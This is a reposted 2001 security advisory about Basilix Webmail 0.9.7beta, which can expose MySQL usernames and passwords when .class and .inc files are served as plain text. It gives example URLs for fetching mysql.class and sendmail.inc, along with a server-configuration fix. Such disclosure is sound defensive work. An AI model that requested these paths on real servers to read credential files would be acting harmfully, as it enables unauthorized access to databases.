Advisories : Basilix Webmail System Permission Vulnerability

main menu

- feedback
- advertising
- privacy
- FightAIDS
- newsletter
- news

discussions

- read forum
- new topic
- search

meetings

- meetings list
- recent additions
- add your info

top 100 sites

- visit top sites
- sign up now
- members

webmasters

- add your url
- add domain
- search box
- link to us

projects

- our projects
- free email

m4d network

- security software
- secureroot
- m4d.com

Home : Advisories : Basilix Webmail System Permission Vulnerability

Title:	Basilix Webmail System Permission Vulnerability
Released by:	tamersahin.net
Date:	12th January 2001
Printable version:	Click here

---------------------------------------------------

tamersahin.net Security Solutions Announcement

---------------------------------------------------

 

Basilix Webmail System *.class *.inc Permission Vulnerability

 

 

Release Date:

January 12, 2001

 



Version Affected:

Basilix Webmail System 0.9.7beta

 



Description:

There is a simple mistake in the Basilix Webmail system. If .class file extension is not defined as a PHP script at the httpd.conf any attacker may see very valuable information by simply enterering the URL : 

 

http://victim.host/mysql.class

 

MySQL password and username is stored in this file. 

 



Example Exploit:

 

http:///class/mysql.class

 

http:///inc/sendmail.inc (settings.inc and etc.)

 



Solutions:

Class and inc file extensions should be defined as PHP files and shouldn' t be given read permissions from outside. Obviously, MySQL port should also be filtered from remote connects.

Regards;



Tamer Sahin

http://www.tamersahin.net

feedback@tamersahin.net 



"Every blows that don't kill me make me stronger."